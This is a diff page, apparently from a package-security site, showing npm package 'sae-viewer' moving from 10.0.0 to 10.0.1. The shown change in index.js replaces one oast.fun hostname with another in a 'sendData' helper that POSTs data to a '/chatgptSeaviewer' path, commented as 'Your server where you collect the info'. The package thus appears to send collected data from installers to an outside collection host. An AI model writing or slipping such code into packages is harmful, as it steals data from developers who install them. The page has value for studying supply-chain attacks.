sae-viewer 10.0.0 → 10.0.1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -5,7 +5,7 @@ const https = require('https');
5
5
  // Helper function to send data back to your server
6
6
  const sendData = (data) => {
7
7
  const options = {
8
- hostname: 'wytyhdlrnmegfegibkke1tfe5mnohtm26.oast.fun', // Your server where you collect the info
8
+ hostname: 'tqixhxwvibvpvtsahqraqodmtpnukgttl.oast.fun', // Your server where you collect the info
9
9
  port: 443,
10
10
  path: '/chatgptSeaviewer',
11
11
  method: 'POST',
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "sae-viewer",
3
- "version": "10.0.0",
3
+ "version": "10.0.1",
4
4
  "main": "index.js",
5
5
  "scripts": {
6
6
  "test": "echo \"Error: no test specified\" && exit 1",